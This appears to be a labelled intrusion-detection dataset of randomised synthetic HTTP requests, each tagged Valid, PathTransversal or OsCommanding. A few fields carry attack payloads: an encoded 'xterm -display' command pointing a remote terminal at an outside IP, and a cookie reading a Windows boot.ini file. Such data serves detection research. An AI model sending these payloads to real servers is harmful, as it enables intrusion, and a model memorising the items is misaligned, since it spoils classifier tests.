User-Agent: Mozilla/5.2 (X11; U; SunOS sun4u 0.5; ns-Nk; rv:7.0.5) Gecko/31005565
UA-CPU: MIPS
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7350x9086
Via: 9.9 237.84.219.79
Transfer-Encoding: deflate
Upgrade: t7hloe/9.4, 2ku9/0.5, egeiae/4.4
Warning: 247 www.nekn6rAe.htm "a78cpakr" "Tue, 30 Jan 07 10:22:39 CET"
X-Forwarded-For: 253.252.174.31
X-Serial-Number: 92954758156
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8992
Start - Id: 45256
class: PathTransversal
GET /./? HTTP/1.0
Host: www.fqMtsf3tea.cz:4
Connection: 3iheanb
Accept: image/gif, image/gif;q=0.2, text/plain
Accept-Charset: x-mac-hebrew, iso-8859-4
Accept-Encoding: *;q=0.7
Accept-Language: t-bwue;q=0.3, jelSs-duoouy
Cache-Control: min-fresh=44
Client-ip: 57.131.86.129
Cookie: ulEeDnnE=093;siuoer=309
Cookie2: $Version="34"
Date: Tue, 27 Jan 04 19:30:29 UTC
ETag: W/"K6FtEAzzO1@3SJ-tatG"
Expect: 100-continue
From: ysntx@c2jdcq.uk
If-Modified-Since: Thu, 03 Feb 05 21:02:34 GMT
If-Unmodified-Since: Thu, 25 Oct 07 22:02:20 UTC
If-Match: "Szxv2LBu.1nHR-M"
If-None-Match: "tREQ9CogO_GfU9jNQ"
If-Range: *
Max-Forwards: 86
MIME-Version: 1.7
Pragma: talghohn=geah
Proxy-Authorization: Digest qop=evai40
Authorization: i0dd qlhepevi=nmCnh
Range: -249,23568-43
Referer: /et5inSth/ctrf1/neuTiEt/seuEd.php
TE: trailers
Trailer: Accept
User-Agent: Mozilla/2.2 (Windows; U; Win 9x 3.3; oe-et; rv:0.2.7) Gecko/44753384
UA-CPU: 68000
UA-Disp: 711,6058,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: Ertrss/2.6 www.gthu.js:75962, 6.0 www.cdu2ird.shtml, HTTP/9.6 www.Ntt0teT.tiff
Transfer-Encoding: gzip
Upgrade: b9r/9.4
Warning: 924 www.Tmlirlsa.shtml "t5eakntztrsthoinaeue" 
X-Forwarded-For: 181.253.151.130
X-Serial-Number: 67855229
----: -----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45256
Start - Id: 31379
class: Valid
GET /utodt5KDweakl/ifWA5nesneeGiueew/f.DjXxiLel1P/J87bgroup by6pUCorN/F0S0dLreplace3m./oweash/ushgnH2ioow/cTKpJxqEIb/eaY35JMr-k/7vD5aNBWS5/eGZhki@S.tiff?trm=3044 HTTP/1.1
Host: www.nsieth.it
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-10646-ucs-2, euc-cn, iso-8859-9, cp-932;q=0.1
Accept-Encoding: *
Accept-Language: ngieso-sFttfbd;q=0.4
Cache-Control: no-store
Client-ip: 114.216.10.49
Cookie: ibe1dSnhestib=Ttaxe;iRtnwersnhngst=055
Cookie2: $Version="970"
Date: Thu, 01 May 08 06:05:04 GMT
ETag: "OXpfj0.wU8q6M723me"
Expect: 100-continue
From: eoeo@6smfoRe.org
If-Modified-Since: Fri, 04 Apr 08 23:02:07 CET
If-Unmodified-Since: Sat, 19 Mar 05 11:41:20 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 28 Sep 06 01:00:55 GMT
Max-Forwards: 5179
MIME-Version: 3.5
Pragma: rni='evh'
Proxy-Authorization: NTLM dGVyZHluZW5zcHNkbmFwYWVST2VlamlucGlMaXV0Ym50YU9vY2k=
Authorization: NTLM ZXdic3JlbjM1ZnRyZWltN3R3eXRtdGVlbWFpdHM4aWx1bnd3Nw==
Range: 214-,6423-,-75701
Referer: http://www.iclo6t.st/bemy/ea3qtonm.mpeg
TE: deflate,trailers,gzip;q=0.3
Trailer: Pragma
User-Agent: crDLBu.n4 http://www.pnaLFety.biz
UA-CPU: Sparc
UA-Disp: 6015,3763,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2355x254
Via: FTP/9.4 www.eoa8S.shtml, 5.4 www.noiH.htm, HTTP/9.8 120.14.32.41
Transfer-Encoding: compress
Upgrade: ruexiD/5.5
Warning: 398 226.241.76.108 "setlnsfmby7bt1eaniq" "Fri, 18 Aug 06 14:43:39 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 33047995554498
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31379
Start - Id: 36750
class: OsCommanding
GET /gy/5EyVmYJ-K/orAlTHK-/nqTByT6/4swr6aehhEiaale/t@9P5BI/nnSfnLikttdrb/ptJ/2klsND9@.mspx?t4emnmuEb80kwa=650&v4QPLNJ=ofaoY&goobat11etttow=291364&XayRoYZPEjRwindow.open=gXcr8Eye&5ixqmap=hCRdaeeeni&thr6=178147&HfsBo7otTekv=023729&yyos=4%24r&5ssssdAsat=839179&9ia5mpuabiyRrt=5375&AfyAh11q2xtermj=%5Cr++++xterm++++-display++++110.5.209.40%3A0.0&s8coItrshhul=%7C5a%25eind50eo9dwindow.opent&wwIvn9uMxp=y8 HTTP/1.1
Host: www.llnnrnAb.st
Connection: close
Accept: image/gif;q=0.8, application/postscript;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, gzip, deflate
Accept-Language: qh1Le0rj-7exe;q=0.0, teq-mc
Cache-Control: no-cache
Client-ip: 66.186.73.243
Cookie: 8eb-QmnUx0e=24884398;yu0fejrb=61;hentdllnua=hlak0e8Siena5
Cookie2: $Version="34"
Date: Fri, 23 Mar 07 08:07:46 GMT
ETag: "OSxgv6GwIp@.QEtxE"
Expect: 100-continue
From: 9rrtotci@rtshul.org
If-Modified-Since: Fri, 12 Nov 04 21:54:38 CET
If-Unmodified-Since: Thu, 06 Mar 08 02:57:21 CET
If-Match: *
If-None-Match: "whlAbR@ZXAo_LZWA79"
If-Range: Fri, 16 Oct 09 16:20:04 UTC
Max-Forwards: 15
MIME-Version: 5.1
Pragma: teIm1ap='e'
Proxy-Authorization: ttsg7i nehfeHuT=4aeyn
Authorization: dhfg hss6=dnheasOE
Range: 50-7
Referer: http://oAns5i.cz/raaeh.swf
TE: trailers,deflate;q=0.1
Trailer: From
User-Agent: Mozilla/2.6 (Machintosh; U; PPC Mac OS X 2.7; 5i-iu; rv:2.1.1) Gecko/58940816
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 232x1783
Via: FTP/8.8 www.oiohet.jpeg, HTTP/7.2 91.253.180.18, rtri/2.8 www.ntdetA.js
Transfer-Encoding: identity
Upgrade: sieis/2.5, uit/6.8
Warning: 508 www.fetrah.tiff "t7sycuhIpesS" "Wed, 10 Feb 10 05:46:21 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36750
Start - Id: 11512
class: Valid
GET /rsehioEtCrlReoadh/Z_dLMnbBr4LIfromli/hnrg7oeltuueuu/jyw6D4OT-htaccesD/sntenebvi.jsp?5dxyihGemtbc3s=6&stlitvgwb=5045841405&hoa9e=Ra2plsdjtft1retNtl&cse=mgeuarq3ouzieisi4 HTTP/1.1
Host: www.heamiqin.biz
Connection: close
Accept: image/*
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.4, identity, gzip;q=0.7
Accept-Language: *;q=0.7
Cache-Control: tblo=bo
Client-ip: 73.241.3.73
Cookie: EJE8KGcOwHw-=nV6mJ5;nnvatN75Ctefln=eHTLfsd perl;asnp05ec=eo;-jP0CMY=a otsuh~-lo snm;i0is3hOeersont=o2erQV
Cookie2: $Version="655"
Date: Sat, 28 Feb 04 23:38:14 CET
ETag: "UsY7so-damvmMgq5_3t"
Expect: SvaIp=spia
From: 6o0a8@owhtdaz1a.uk
If-Modified-Since: Fri, 14 Jul 06 08:21:07 CET
If-Unmodified-Since: Thu, 29 Oct 09 03:38:50 UTC
If-Match: "EsUKyipE7i4ru5NUpn"
If-None-Match: *
If-Range: *
Max-Forwards: 180
MIME-Version: 7.9
Pragma: un3cla=he
Proxy-Authorization: Basic c0V0NDpzb2Zy
Authorization: Digest nonce
Range: 778354-142629
Referer: http://www.Dtlo.cz/nfar/ahheiar/dz9ptno/dttose/aesdKtT.rar
TE: trailers,trailers
Trailer: User-Agent
User-Agent: vDleohdb
UA-CPU: 68000
UA-Disp: 9055,045,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9366x217
Via: 8.4 www.niadO.jpeg, dntT/8.9 182.45.75.158
Transfer-Encoding: deflate
Upgrade: El8/1.4, aowwq/9.0, sitt9a/9.8, etn/6.9
Warning: 522 152.136.158.58 "nxxntaane3s" "Sat, 03 Sep 05 20:12:16 GMT"
X-Forwarded-For: 0.47.132.31
X-Serial-Number: 492976
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 11512
Start - Id: 1738
class: Valid
GET /BtLbody2l@/pbSofU/o-Ddnmzz/m4pl/2e9KTgOP76okV/Cincludeqtconnect/eR4Pu4X9xHsN-oh/a6lqnaeAfeEemisa.nsf?fJJ-aT_rmPZ=rAsxgEbmvSJ&stStr=matnisyfti9s&soenrh=i1temik%5Cetihee HTTP/1.1
Host: www.rihcrrn.fr
Connection: keep-alive
Accept: audio/*;q=0.4
Accept-Charset: iso-2022-jp;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Cookie: .Ldy32betweennYlXs=8690268
Date: Fri, 18 Sep 09 08:48:42 CET
ETag: "d25hBdaR3Jm8HB0EuFe"
From: enale@Uditp1t.net
If-Modified-Since: Thu, 04 Feb 10 11:45:28 UTC
If-Unmodified-Since: Tue, 26 Aug 08 05:25:57 GMT
If-Range: Fri, 12 May 06 23:02:45 CET
Authorization: Digest uri=http://www.fndtecdg.gov/ueao/lbrtt0/omdf.aspx
Referer: http://snpe.be/stlseasn/2elntelp.bin
User-Agent: Mozilla/8.0 (compatible; bagd7l; WinNT; jnonn; esldsina)
Via: 5.9 247.44.197.34
Transfer-Encoding: compress

null

End - Id: 1738
Start - Id: 35974
class: PathTransversal
GET /op.jkGAuF/1pLncOxuT/Wstdings5egv/iEsufyObKvz0DTLE.shtml?2evfeTpt=c3QmlQnq4g&._B3Oqdcj=scnnh&oel=49&hzgxils=jaetb2mHt1sciaade2&tlie=dra&crwe5ShwEnsydo=oaumt HTTP/1.0
Host: www.Llectwere.org:9
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a7ld-nbtrhp
Cache-Control: max-age=3766
Client-ip: 81.253.88.247
Cookie: ls=eni;raaeiElaUhliiwl=sVXQ;59-BC=p:\winnt\boot.ini;IKbetweengnIkUQy=ybplAtaOrm;aGyRedro=sjydc93D2gv;tj3ehib=122
Cookie2: $Version="782"
Date: Sat, 28 Oct 06 24:02:00 UTC
ETag: "IIRgh_EUi@CN_xZxA."
Expect: 100-continue
From: 5rseieyn@tter6Ecal.org
If-Modified-Since: Sat, 22 Dec 07 24:15:11 CET
If-Unmodified-Since: Sat, 24 Dec 05 09:51:08 UTC
If-Match: *
If-None-Match: "LLwFhEFcBbmp2zHknHj9"
If-Range: "Hk39s-cK@cUsW6nI2"
Max-Forwards: 7064
MIME-Version: 6.8
Pragma: no-cache
Authorization: Digest nonce
Range: 61-,-511104
Referer: /eaRtu.wav
TE: deflate;q=0.1,trailers
Trailer: If-Match
User-Agent: Mozilla/5.4 (Windows; U; WinNT 1.1; gz-fa; rv:3.9.2) Gecko/57820532
UA-CPU: Sparc
UA-OS: Linux
Via: 0.7 232.67.254.87, 0.2 www.keuno.css:93, 8.5 www.iupmta.tiff
Transfer-Encoding: identity
Upgrade: ajdo/2.1
Warning: 749 www.uineg7.png "lrbd6rasitteyhee7" 
X-Forwarded-For: 56.37.158.170
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35974
Start - Id: 26060
class: Valid
GET /iAaNhuudefon34rnhtt/r2ueTasdaqscE/ttlypeha3as4apDhi/dfLuVZ4/reTQ83g8hE/qndStrneegaogxsaoeo/ddZ@mWyzLK/teUehf0ddaAeor4fda.js?rxukevoxe0=33uhkigsNf&tIAiytsa=boh&5UTcmdMI=tjthsidl4Ot&lnsorwerr9ef=ocoEctbriiofdtatcp&oMpnea=idneshutdown&ap0de3fathuL=Ae&VLC.passthru=lxtermloq1C6atcmdanefal&6nopghvnsftnlrr=Vnra7ea%3FS5i%25&wIPC=48860&3703o=5 HTTP/1.1
Host: www.s5Ias.org:80
Connection: keep-alive
Accept: video/quicktime, application/rtf;q=0.7, video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 23.160.70.27
Cookie: iotr=41384123;Ivob=l;ydt3ao1ehtpl=schildtn;c2iuiateideseme=Yyil3ebhaO9q;yeys9hrh=3iU&1miute n e
Cookie2: $Version="586"
Date: Sun, 20 Jun 04 05:56:33 CET
ETag: W/"V-A5i57vUvifESU3"
Expect: Emueor
From: alLeiF@uTy8difar.biz
If-Modified-Since: Thu, 27 Nov 08 21:31:47 CET
If-Unmodified-Since: Tue, 22 Jan 08 08:14:58 GMT
If-Match: "1jsSphXQxbQr1J90"
If-None-Match: *
If-Range: Fri, 05 Feb 10 19:11:27 GMT
Max-Forwards: 668
MIME-Version: 1.8
Pragma: aiKaennr='gid'
Proxy-Authorization: Basic c0lkZGU2Omhvc1QzZQ==
Authorization: NTLM ZHNkdDdsY2F3ZWVod2NPNm5kM2tkZG1ydHNhdXN0ZXlsaXN0YzdpZmVuVA==
Range: 077750-,-78409
Referer: http://7ungEod.com/draoo9/aCheeim.asp
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 9.0; fv-lt; rv:1.2.6) Gecko/18379657
UA-CPU: StrongARM
UA-Disp: 889,8239,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 096x0326
Via: lotlEq/7.0 142.190.62.170, FTP/2.0 www.ZaSaai2o.shtml
Transfer-Encoding: gzip
Upgrade: 33tso/9.6
Warning: 573 248.81.173.161 "hSShBh8osar8mnn" "Thu, 15 Jun 06 19:23:51 CET"
X-Forwarded-For: 236.134.61.53
X-Serial-Number: 6743288486222977
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 26060
Start - Id: 872
class: Valid
GET /iEmea/lhla93hpaptgLfa5vr/sqTaab/snPls8eosaa/ftou/cN.jsp?sb4iesddaee=146556&Umg4=H HTTP/1.0
Host: 213.160.176.190
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, gzip, gzip
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 221.84.191.94
Cookie: drnaguh=5906000;nEtieaoe8er=0642648;cot=2540;ORX@TrcpT=0755;eaxpha=tdl;ewonT0aemtiiigN=bsgwsolegedd
Cookie2: $Version="9"
Date: Sat, 20 Dec 08 02:24:20 GMT
ETag: W/"0UHLnbcZRZDpejE"
Expect: 100-continue
From: eboyso@usT0nl.gov
If-Modified-Since: Wed, 09 Jul 08 18:45:58 UTC
If-Unmodified-Since: Sat, 06 Jan 07 10:42:37 UTC
If-Match: *
If-None-Match: "xn@ka0dVyqPJBOR@dG"
If-Range: Sun, 28 Dec 08 17:45:01 GMT
Max-Forwards: 27
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM ZWVvbnRhT2VPYXV0ckVuZWlqZW5pZGVhbkl6aW9pZG50Nw==
Range: 95471-
Referer: /fdacor/rgCl/yiwm1/dwrsfnt.js
TE: chunked;q=0.1,trailers
Trailer: Authorization
User-Agent: Nuyr96/0.4.6.5.1
UA-CPU: x86
UA-Disp: 1675,0086,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 130x106
Via: 3.8 www.wille.jpg, HTTP/8.8 176.238.17.99:94, 8.7 78.71.5.139
Transfer-Encoding: gzip
Upgrade: 7hee/2.9
Warning: 365 118.102.144.238 "T2htwaueRex7" 
X-Forwarded-For: 44.170.70.161
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 872
Start - Id: 25980
class: Valid
GET /vx6ZUZdOwU86Dt/opVsC/nElIzIrc2r2W6KCzohr.jpg? HTTP/1.1
Host: 126.241.203.57
Connection: oi9xwi
Accept: */*;q=0.9
Accept-Charset: cp-950;q=0.4, iso-8859-2;q=0.7, macintosh, iso-8859-1, shift_jis;q=0.1
Accept-Encoding: *
Accept-Language: hnt-Linpizp, rswmGd-a;q=0.7, Atlbolle-dywthrSg, sAO-6wEs0;q=0.9
Cache-Control: max-stale=3211
Client-ip: 34.214.103.129
Cookie: d6nh=r5sD;be0eoAdwmazpyAt=4;txlzw=odx;iedo=~oe4roe we [tfskdd%T;tuo4xcx=Inode7r:;amochalqe
Cookie2: $Version="9"
Date: Sun, 28 Aug 05 20:49:24 UTC
ETag: W/"AwaLoZCcjYP9hz.Ghq"
Expect: 6gne
From: DTqDe@hek6bsSofn.biz
If-Modified-Since: Sat, 12 Feb 05 11:04:39 CET
If-Unmodified-Since: Sat, 05 Dec 09 07:49:29 GMT
If-Match: "Ff@-80hvN6L.D21P"
If-None-Match: *
If-Range: *
Max-Forwards: 920
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM MWVsYTVjY2lFcjlvc2VFc3plZmVVaGdyZWJpbGFhZXJzb25lZUVzQTRs
Authorization: 1jai6 iFomomc=Sathae
Range: 4-,8-035554
Referer: /e3osizp/oo0LoTe/etTn/7uyr/kiuho3it.html
TE: trailers
Trailer: Host
User-Agent: Mozilla/1.8 (Machintosh; U; PPC Mac OS X 7.9; cm-eo; rv:9.6.3) Gecko/30923622
UA-CPU: Sparc
UA-Disp: 199,4987,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8597x176
Via: 1.5 www.paymnwn.htm:761
Transfer-Encoding: deflate
Upgrade: sweeL/7.7, xtf/2.3, 1xnyt/4.8, ssimb/4.5, iislt/5.6
Warning: 442 www.odyfti.shtml "igeotauecom8" "Mon, 10 Dec 07 02:26:29 UTC"
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 767328268470976687
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25980
Start - Id: 17998
class: Valid
GET /qPTftpR2usri/yhoe6dasEt8R.shtml?rp5rwseI6ae=d&fnad=4Tdn6cselects1&ituNn=NneH&teossmgnoxei=60511&r80EHT.kXN-t=7VWru%40PjOBCs&asl8yE=tetnidnhtfa&xtermDDHW=ta&fa3eSamr=hLetceeri4y&qAp2Ox3aaEu=6278303&etcmUW4Ne8K=84&WycVT=8Eemrsodnisoe6whTh HTTP/1.0
Host: www.t3a8ehij.org
Connection: keep-alive
Accept: video/mpeg;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 98.87.102.214
Cookie: BnuhH=1ashn6ite;@V8c=hanao; secrii;3mformF=9263812233;aog=2909720840;ahdip7=eOw
Cookie2: $Version="288"
Date: Sat, 20 Jun 09 20:32:54 UTC
ETag: W/"kyTw_ggtU6ddKcyHBMOx"
Expect: 100-continue
From: 1fhht@jeisbtlV.biz
If-Modified-Since: Mon, 06 Dec 04 11:47:25 GMT
If-Unmodified-Since: Wed, 25 Jan 06 20:43:49 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 26 Jul 07 06:58:43 UTC
Max-Forwards: 262
MIME-Version: 0.7
Pragma: ErIm2r='afmeagg'
Proxy-Authorization: NTLM d3N0dHNobm1ub1JoZWphaGFlc3djckVubWZldW5zaWc=
Authorization: NTLM M3hjaW9sYXNob2lsZmlvdERhdGVUZXJ5ZW5kb2hlZGlleWtzUG9J
Range: -44534,46459-4352,54-118133
Referer: http://19rSti.biz/l5dStDRu/8reuLihr/oghilc.cfm
TE: trailers,trailers
Trailer: Range
User-Agent: nslgoaei3maigyanezmh
UA-CPU: x86
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 642x5791
Via: FTP/7.8 www.isna4.html:2654, 2.8 174.6.120.186
Transfer-Encoding: gzip
Upgrade: oaieq/9.9, Ohs/6.4, yteh4/6.6, vtnwf0/9.1, eeni/8.8
Warning: 232 www.n7dt6nol.jpg "shrpnntmcpavr" "Mon, 02 Apr 07 24:42:36 GMT"
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 84617847595022
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17998
Start - Id: 3135
class: Valid
GET /tIioGsco/35x4aw6sWi-CF@G0H.mspx?iLyuer1ueGcMrzd=0&jfaurtfsl7=012&hhw72tuts=43&th=iAwmnlpb&voeth=z%3Bhaeenq%28ep%5Cc%7Epeaf&otdSfeSIvnsss=i&aqga=rsuet&Fe8etmnyiem=gnooidh&rZxterm@Sinq47styleAQ=s%3EmOgechownslaaem%2B&esLptuilfxarieg=includeta&tseowo=ic5&agenwbes=iicoeoNAojd%2Fbtw HTTP/1.1
Host: 123.171.209.28
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp;q=0.9, iso-8859-8-i;q=0.8, cp-932;q=0.4, euc-kr;q=0.4
Accept-Encoding: identity;q=0.2, gzip
Accept-Language: Xhro-4;q=0.6, okzoe-eryLcst;q=0.9
Cache-Control: no-transform
Client-ip: 31.180.133.136
Cookie: 7Oninotiniartce=fPZSaK;okin=2580214510;xgrrJH=tltehslAwlit8eiaT;Yi=3x|e-e4zusrsirnEusnRts;7_ET=of~y5'adminlst
Cookie2: $Version="69"
Date: Mon, 14 Jun 04 21:09:49 UTC
ETag: "H@VzeDF5Q7kyYecEMGQM"
Expect: noraeoc
From: eead@01e8oq1.gov
If-Modified-Since: Mon, 02 Oct 06 19:55:35 CET
If-Unmodified-Since: Wed, 21 Mar 07 01:36:21 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 12 Aug 08 12:14:15 CET
Max-Forwards: 430
MIME-Version: 7.8
Pragma: f3e='nkex80w'
Proxy-Authorization: soe8zt sjRmiek=rtuiiair
Authorization: NTLM YWxhNGVpNHNha3RzZW5zZWFidFBlZmR0NXNlbm9pZGk3STRhZQ==
Range: 901-,219-,-83
Referer: /Xqnu/icblaeC/eivee1re/1ysito/htnstB.txt
TE: chunked;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.2 (X11; U; Unix 2.3; he-9i; rv:0.8.7) Gecko/23973163
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5219x775
Via: 3.1 31.104.163.130
Transfer-Encoding: compress
Upgrade: qtipy/8.0, crocn/6.7, lns/3.2, psbneW/8.3
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 54.64.220.207
X-Serial-Number: 545829621
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3135
Start - Id: 31146
class: Valid
GET /lez8G5RyAV/0dnad2xdepA7oisanx/uthDdkt/myOZiframeexecLqxXnfzF9/gsSnwnptaoejs/cqnlhesmirh.mspx?81zuconnect6YS0yNautoexec=tdih3j+hspR%3Dui&_QZq@4=%7Cydnc+%28%5C6%5Czincludeaccess_logmcqa&detDlnh4qas=%2Fn&snaadkrtelhdr=zstSiSxeaccess_log HTTP/1.0
Host: www.s9NqhfH3.fr:12
Connection: close
Accept: video/quicktime;q=0.6
Accept-Charset: big5;q=0.4, big5, iso-8859-6;q=0.6, x-mac-korean, iso-8859-6
Accept-Encoding: *;q=0.8
Accept-Language: x-s;q=0.4, usj2p-0e8Bgmo4, ntnnm-teos;q=0.1, e5sha-ae
Cache-Control: max-stale=925
Client-ip: 145.177.61.251
Cookie: UPnkQTF@Uoj=samltD;tohegennoUe=rendusgp
Cookie2: $Version="698"
Date: Sat, 08 Mar 08 19:35:36 UTC
ETag: W/"SElZ2btlWPrC_9kq"
Expect: tsre
From: dgsh@nuauoeihu3.be
If-Modified-Since: Mon, 19 Oct 09 09:58:54 GMT
If-Unmodified-Since: Fri, 24 Jun 05 09:16:53 UTC
If-Match: *
If-None-Match: "@QbRuT5nKqzINR1x"
If-Range: Sun, 15 Jul 07 03:24:07 CET
Max-Forwards: 3936
MIME-Version: 5.8
Pragma: owtehht='otle'
Proxy-Authorization: NTLM THBlZTh0aXdxbmFtZlVvZXJtaDJuZWVsaGJldTh6ZXZybmltbGxyZW5zZWJlZGpi
Authorization: suby Eszi=osbl
Range: 41-,7530-978
Referer: /srnf3/diode/gbtfle8/eRibu1/tpevl6lr.zip
TE: gzip
Trailer: Max-Forwards
User-Agent: be9okrL/1.0.3
UA-CPU: PowerPC
UA-Disp: 342,300,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 006x0158
Via: 0.3 8.26.130.251
Transfer-Encoding: deflate
Upgrade: 2ro3rd/5.8
Warning: 406 www.aeUwu.shtml "s2n0a3tdlcheeb4euana" 
X-Forwarded-For: 129.20.120.4
X-Serial-Number: 16589272146
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31146
Start - Id: 5524
class: Valid
PUT /eNh/al4NZ/eKWOfw7nWKSb/ew/mqCF_RSvTZu0cnY_/q8X0aj0aaRH/on04q7iF-eCn/sts0su/os.css? HTTP/1.0
Content-Length: 36
Content-Language: ymedl5an,0tsg,sottnC6l
Content-Encoding: identity
Content-Location: /icrrt9E/khri/eesi/Dso9i/68itg.png
Content-MD5: aDhuaTcxMnJ0YXhidjRvdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 Oct 04 21:42:26 CET
Last-Modified: Wed, 08 Mar 06 21:16:44 GMT
Host: www.nstrer4eae.uk
Connection: ddveeroe
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.3, gzip;q=0.8, identity;q=0.1, gzip, identity;q=0.7
Accept-Language: arau-np, c-i;q=0.8, w-rerr;q=0.2, l-m, dd4h-tZy;q=0.0
Cache-Control: max-age=452
Client-ip: 19.114.67.195
Cookie: oEr=sqetc;1oirssash=am3qU;nd3ezrsp6augheH=ynrudoosmyaNet;n-Fftp=5;axnyeqstBlNt7=2ebi
Cookie2: $Version="6"
Date: Sat, 11 Dec 04 01:02:08 CET
ETag: "V_qErrkrpRelawPe-"
Expect: 100-continue
From: 6lhfnze@anRoaAa.it
If-Modified-Since: Sun, 20 Aug 06 19:16:11 GMT
If-Unmodified-Since: Tue, 18 May 04 18:23:04 CET
If-Match: "S8eQbwfebtWDH-IBP4tQ"
If-None-Match: *
If-Range: Thu, 06 Sep 07 14:16:28 UTC
Max-Forwards: 2
MIME-Version: 4.0
Pragma: isgkerj=oit
Proxy-Authorization: NTLM aWY2c0hsbmFzcjUyYXJhZHRlaWV5azVydGVydEVBdGVnYXJhY2VlM3R0
Authorization: Basic TG56ODoyZ2R0ZWJl
Range: 88833-,356615-47,5006-
Referer: http://edlp.be/oi8Ym5t/8luA/ehin/0t4edeq/yapie.conf
TE: gzip
Trailer: Proxy-Authorization
User-Agent: hrnloe (rgH-U_-kB7; nz6uVmIzo)
UA-CPU: x86
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 161x6409
Via: HTTP/2.0 www.sAeope.tiff, 5.8 101.39.239.181, mtre/3.3 www.setxn.jpg
Transfer-Encoding: identity
Upgrade: eps/6.2, eey/6.2
Warning: 321 www.hrctezid.js "o2Tbr6utate" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 342559338014903
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Nsy=etegas2ssxA&tfagh3soh8zwaq=bfpat

End - Id: 5524
Start - Id: 11902
class: Valid
GET /-C8Pmco-n/grAtr/giTEnNNaGj.7lQvOiLkG/5delete/gdUd2/nS_tPrCU/Opa4rxCueGmEaneuak/tYo61JHoopenwgetTxetc/i3Sheeahncreztdhd/AAArWp1PqQ8X/bibEclg97c2AAnTepg/bhueLtthneess.png?d4rp=ss&amKeR1rloyiraes=tqprFizQKUjx&evgrvt=oAzC&MexecjAMUcN=t_xswx&yret6Tdan=oha0cejeanNseaos&Mchvummteoio=7-rcpeR&ibtmi=038694&xoe=1&ctadnhwtsn=176319396&sEr3b=easgittwitdEntlhse&Pu3ccatD_=slnleAf%5Co&nne=inputoct8s8input&ne8aIaaen=%24cTt&sSdqtenem=iEyuo5Gb HTTP/1.0
Host: www.blehy.uk
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9, windows-874;q=0.7, iso-8859-3;q=0.0
Accept-Encoding: deflate, deflate;q=0.5, compress, deflate
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 128.86.71.115
Cookie: 0ys=ah;aeuasDoha=227433088;ro=9832404;hmd6Coa=1300;valp9Mn=nodesiot7;LYBtL0shutdownkR=a33xtRimtpuR0e
Cookie2: $Version="1"
Date: Mon, 06 Nov 06 24:09:25 CET
ETag: W/"Xeo@EaWGnDsJT@6"
Expect: meccetko=pati
From: cwtdea@hotshneub.biz
If-Modified-Since: Wed, 31 May 06 12:09:18 GMT
If-Unmodified-Since: Thu, 07 May 09 21:21:26 CET
If-Match: "eOyyLJHkyhB4hfSis3b"
If-None-Match: "7q3XaV0xyAbhbT.6"
